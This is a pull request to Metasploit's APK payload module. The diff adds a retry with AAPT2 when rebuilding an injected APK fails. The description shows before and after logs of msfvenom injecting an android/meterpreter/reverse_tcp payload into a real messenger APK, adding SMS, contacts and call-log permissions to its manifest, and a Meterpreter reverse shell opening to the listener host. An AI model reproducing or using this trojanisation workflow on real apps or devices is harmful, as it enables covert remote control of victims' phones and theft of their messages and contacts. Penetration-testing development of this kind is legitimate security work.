### PR TITLE
Msf::Payload::Apk: Try rebuilding APK with AAPT2 if rebuilding APK fails

### DIFF
--- a/lib/msf/core/payload/apk.rb
+++ b/lib/msf/core/payload/apk.rb
@@ -357,7 +357,13 @@ class Msf::Payload::Apk
 
     unless File.readable?(injected_apk)
       print_error apktool_output
-      raise RuntimeError, "Unable to rebuild apk with apktool"
+      print_status("Unable to rebuild apk. Trying rebuild with AAPT2..\n")
+      apktool_output = run_cmd(['apktool', 'b', '--use-aapt2', '-o', injected_apk, "#{tempdir}/original"])
+
+      unless File.readable?(injected_apk)
+        print_error apktool_output
+        raise RuntimeError, "Unable to rebuild apk with apktool"
+      end
     end
 
     if signature


### PR DESCRIPTION
I wasn't able to find any reliable way to detect whether an APK was built with AAPT2 (that doesn't mean there isn't one).

The easiest option is to simply try rebuilding with AAPT2 if rebuilding with AAPT fails. Not efficient, but foolproof.

Fixes #16152

Tested using:

* https://github.com/MixinNetwork/android-app/releases/download/v0.32.1/320100.apk

# Before

```
# ./msfvenom -x apks/minix.apk -p android/meterpreter/reverse_tcp LHOST=192.168.200.130 LPORT=4444 -o asdf.apk
/usr/lib/ruby/2.7.0/timeout.rb:50: warning: already initialized constant Timeout::THIS_FILE
/var/lib/gems/2.7.0/gems/timeout-0.2.0/lib/timeout.rb:53: warning: previous definition of THIS_FILE was here
/usr/lib/ruby/2.7.0/timeout.rb:51: warning: already initialized constant Timeout::CALLER_OFFSET
/var/lib/gems/2.7.0/gems/timeout-0.2.0/lib/timeout.rb:54: warning: previous definition of CALLER_OFFSET was here
Using APK template: apks/minix.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package one.mixin.messenger.isekn
[*] Loading /tmp/d20220313-319000-o5arhw/original/smali/one/mixin/android/MixinApp.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.CALL_PHONE"/>
[*] Adding <uses-permission android:name="android.permission.SET_WALLPAPER"/>
[*] Adding <uses-permission android:name="android.permission.READ_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
[*] Adding <uses-permission android:name="android.permission.READ_SMS"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
[*] Adding <uses-permission android:name="android.permission.SEND_SMS"/>
[*] Adding <uses-permission android:name="android.permission.RECEIVE_SMS"/>
[*] Rebuilding apk with meterpreter injection as /tmp/d20220313-319000-o5arhw/output.apk
[-] I: Using Apktool 2.6.0
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes2 folder into classes2.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes3 folder into classes3.dex...
I: Checking whether resources has changed...
I: Building resources...
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
W: invalid resource directory name: /tmp/d20220313-319000-o5arhw/original/res navigation
brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 1): [/tmp/brut_util_Jar_178274738761495878174792389057106999835.tmp, p, --forced-package-id, 127, --min-sdk-version, 23, --target-sdk-version, 29, --version-code, 320100, --version-name, 0.32.1, --no-version-vectors, -F, /tmp/APKTOOL14147502011175778145.tmp, -e, /tmp/APKTOOL18233519918314392348.tmp, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, -S, /tmp/d20220313-319000-o5arhw/original/res, -M, /tmp/d20220313-319000-o5arhw/original/AndroidManifest.xml]
Error: Unable to rebuild apk with apktool
```

# After

```
# ./msfvenom -x apks/minix.apk -p android/meterpreter/reverse_tcp LHOST=192.168.200.130 LPORT=4444 -o asdf.apk
/usr/lib/ruby/2.7.0/timeout.rb:50: warning: already initialized constant Timeout::THIS_FILE
/var/lib/gems/2.7.0/gems/timeout-0.2.0/lib/timeout.rb:53: warning: previous definition of THIS_FILE was here
/usr/lib/ruby/2.7.0/timeout.rb:51: warning: already initialized constant Timeout::CALLER_OFFSET
/var/lib/gems/2.7.0/gems/timeout-0.2.0/lib/timeout.rb:54: warning: previous definition of CALLER_OFFSET was here
Using APK template: apks/minix.apk
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package one.mixin.messenger.nrluw
[*] Loading /tmp/d20220313-317960-iqv56w/original/smali/one/mixin/android/MixinApp.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>
[*] Adding <uses-permission android:name="android.permission.SEND_SMS"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CONTACTS"/>
[*] Adding <uses-permission android:name="android.permission.RECEIVE_SMS"/>
[*] Adding <uses-permission android:name="android.permission.READ_SMS"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
[*] Adding <uses-permission android:name="android.permission.READ_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.SET_WALLPAPER"/>
[*] Adding <uses-permission android:name="android.permission.CALL_PHONE"/>
[*] Rebuilding apk with meterpreter injection as /tmp/d20220313-317960-iqv56w/output.apk
[-] I: Using Apktool 2.6.0
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes2 folder into classes2.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes3 folder into classes3.dex...
I: Checking whether resources has changed...
I: Building resources...
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
W: invalid resource directory name: /tmp/d20220313-317960-iqv56w/original/res navigation
brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 1): [/tmp/brut_util_Jar_3949854634119570592425445093050072320.tmp, p, --forced-package-id, 127, --min-sdk-version, 23, --target-sdk-version, 29, --version-code, 320100, --version-name, 0.32.1, --no-version-vectors, -F, /tmp/APKTOOL2168848540518483719.tmp, -e, /tmp/APKTOOL14431781353956821076.tmp, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, -S, /tmp/d20220313-317960-iqv56w/original/res, -M, /tmp/d20220313-317960-iqv56w/original/AndroidManifest.xml]
[*] Unable to rebuild apk. Trying rebuild with AAPT2..
[*] Aligning /tmp/d20220313-317960-iqv56w/output.apk
[*] Signing /tmp/d20220313-317960-iqv56w/aligned.apk with apksigner
Payload size: 28182490 bytes
Saved as: asdf.apk
```

```
msf6 exploit(multi/handler) > 
[*] Sending stage (78153 bytes) to 192.168.200.135
[*] Meterpreter session 5 opened (192.168.200.130:4444 -> 192.168.200.135:49768 ) at 2022-03-13 10:17:26 -0400

msf6 exploit(multi/handler) > sessions -i 5 
[*] Starting interaction with 5...

meterpreter > getuid
Server username: u0_a161
meterpreter > pwd
/data/user/0/one.mixin.messenger/files
```
